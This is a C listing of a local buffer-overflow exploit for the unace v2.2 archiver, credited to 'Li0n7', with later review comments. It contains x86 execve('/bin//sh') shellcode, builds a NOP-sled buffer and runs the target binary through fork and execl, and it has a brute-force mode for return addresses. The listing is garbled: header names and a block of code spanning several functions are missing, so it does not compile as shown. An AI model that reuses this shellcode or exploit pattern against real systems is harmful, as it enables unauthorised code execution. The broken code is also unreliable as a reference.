/*
 * Local exploit for unace v2.2 by Li0n7
 * Bug reported by Andreas Constantinides
 * contact me: Li0n7@voila.fr
 * visit us: ioc.fr.st
 * tested on slackware 9.0
 * usage: ./unace-exp [-r ][-b [-s ][-d ]]
 *        (the option-argument placeholders were lost when this page was extracted)
 * -r : try to exploit unace with specified as return address
 * -b : enables bruteforcing
 * -s : specify the first address to bruteforce
 * -d : the value to take away from the starting address at each bruteforcing iteration
 */

/*
 * NOTE(review): historical listing kept for reference. As shown on this page it
 * does not build: the six header names after #include were stripped by the HTML
 * extraction, and a span of source starting inside make_string() -- the rest of
 * that function, all of bruteforce(), and the head of banner() -- is missing.
 * Nothing below reconstructs the lost code; comments only mark where it was.
 * The addresses and the binary path are hard-wired to the author's test
 * machine (see the "tested on" line above), so the listing documents the bug
 * rather than a working tool.
 */
#include
#include
#include
#include
#include
#include

#define BSIZE 600                            /* bytes of filler + payload at the front of the buffer */
#define SIZE BSIZE*2                         /* unparenthesized expansion: harmless in malloc(SIZE) below, but a macro-hygiene hazard */
#define D_DIFF 1                             /* default step for -d */
#define D_START 0xbfffffff                   /* default -s start address; specific to the author's machine */
#define PATH "/tmp/test/exploits/src/unace"  /* author's private copy of the target binary, not a system path */
#define RET 0xbffff73a                       /* defined but not referenced by any code visible on this page */

/* Payload supplied by the original author, kept byte-for-byte. The visible
 * "/bin//sh" string and the trailing \xcd\x80 identify it as a Linux x86
 * system-call stub; its length is well under BSIZE, which make_string()
 * relies on without checking. */
char shellcode[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

char *buffer,*ptr;                           /* buffer: SIZE-byte heap block built by make_string(); ptr: write cursor into it */

/* Typo: this prototype declares exec_culn(), but the function defined below is
 * exec_vuln(). The prototype is dead; exec_vuln() is declared only by its own
 * definition, which precedes its use in tease(), so it still compiles. */
void exec_culn();
int tease();
int make_string(long ret_addr);
int bruteforce(long start,int diff);
void banner(char *argv0);

/*
 * Entry point. Parses -b, -d, -r, -s with getopt(). -r builds the buffer for
 * the given address and runs the target once; -b hands off to bruteforce(),
 * which is not visible on this page.
 *
 * Review notes:
 *  - `opterr` here is a local int that shadows getopt's global of the same
 *    name, so the assignment does not silence getopt's own diagnostics, which
 *    looks like what was intended.
 *  - `argc < 1` is effectively never true, and argv[0] has already been
 *    dereferenced in banner() before the check.
 *  - -d uses atoi(), so a non-numeric value silently becomes 0 (a zero step
 *    would presumably stall bruteforce()); -r/-s use strtoul() but check
 *    neither the end pointer nor errno.
 *  - The return values of make_string() and tease() are discarded, and the
 *    block make_string() allocates is never freed before exit(0).
 */
int main(int argc,char *argv[])
{
    char * option_list = "bd:r:s:";
    int option,brute = 0,opterr = 0,diff = D_DIFF;
    long ret,start = D_START;
    banner(argv[0]);
    if (argc < 1) exit(-1);
    while((option = getopt(argc,argv,option_list)) != -1)
        switch(option) {
        case 'b': brute = 1; break;
        case 'd': diff = atoi(optarg); break;                  /* unchecked conversion, see notes above */
        case 'r': ret = strtoul(optarg,NULL,0); make_string(ret); tease(); exit(0); break;   /* single attempt, then exit */
        case 's': start = strtoul(optarg,NULL,0); break;
        case '?': fprintf(stderr,"[-] option \'%c\' invalid\n",optopt); banner(argv[0]); exit(-1);
        }
    if(brute == 1) bruteforce(start,diff);
    return 0;
}

/* Child side of tease(): replaces the process image with the target binary,
 * passing the crafted global `buffer` as the argument after "e". execl()'s
 * return is not checked: if it fails (e.g. PATH does not exist) the child
 * simply returns, reaches the final `return 1` in tease(), and carries on as a
 * duplicate of the parent. */
void exec_vuln()
{
    execl(PATH,PATH,"e",buffer,NULL);
}

/*
 * Runs the target once in a child process and reports how it ended.
 *
 * Returns: the child's exit status when it exited normally (also printed as
 * "[+] Exited" on stdout), the signal number when it was terminated by a
 * signal, and 1 when wait() failed or the child was stopped. main() discards
 * the value. Exits the whole program with status 13 if fork() fails, and
 * abort()s if wait() returns some other pid, which is not expected with a
 * single child. In the child, a failed exec_vuln() also falls through to the
 * final `return 1`.
 */
int tease()
{
    pid_t pid;
    pid_t wpid;
    int status;
    pid = fork();
    if ( pid == -1 ) {
        fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
        exit(13);
    } else if ( pid == 0 ) {
        exec_vuln();                                             /* only returns on exec failure */
    } else {
        wpid = wait(&status);
        if ( wpid == -1 ) {
            fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
            return 1;
        } else if ( wpid != pid )
            abort();
        else {
            if ( WIFEXITED(status) ) {
                printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
                return WEXITSTATUS(status);
            } else if ( WIFSIGNALED(status) ) {
                return WTERMSIG(status);                         /* signal number, not a distinct error code */
            } else {
                fprintf(stderr, "[-] Stopped.\n");
            }
        }
    }
    return 1;
}

/*
 * Builds the argument in the global `buffer`: a run of 0x90 bytes followed by
 * the payload, positioned so the payload ends exactly BSIZE bytes in. The rest
 * of the function -- which is where ret_addr and the `addr`/`addr_ptr` locals
 * would be used, since none of them appear in the visible part -- was lost in
 * extraction at the `for(i=0;i` fragment below and is NOT reconstructed here.
 * `ret` is declared but unused in what is visible. malloc() is checked; the
 * block is never freed. strlen() is used as the payload length, so the payload
 * must contain no 0x00 byte (it does not).
 */
int make_string(long ret_addr)
{
    int i;
    long ret,addr,*addr_ptr;
    buffer = (char *)malloc(SIZE);
    if(!buffer) { fprintf(stderr,"[-] Can't allocate memory, exiting...\n"); exit(-1); }
    ptr = buffer;
    memset(ptr,0x90,BSIZE-strlen(shellcode));                    /* assumes strlen(shellcode) <= BSIZE; not checked */
    ptr += BSIZE-strlen(shellcode);
    /* ---- extraction damage: from here to the tail of banner() the source is missing ---- */
    for(i=0;i\n");
    /* The three fprintf() calls below are the tail of banner(char *argv0);
     * its signature and first fprintf() were lost with the span above. */
    fprintf(stderr," visit us: http://www.ioc.fr.st\n");
    fprintf(stderr," contact me: Li0n7[at]voila[dot]fr\n");
    fprintf(stderr," usage: %s [-r ][-b [-s ][-d ]]\n\n",argv0);
}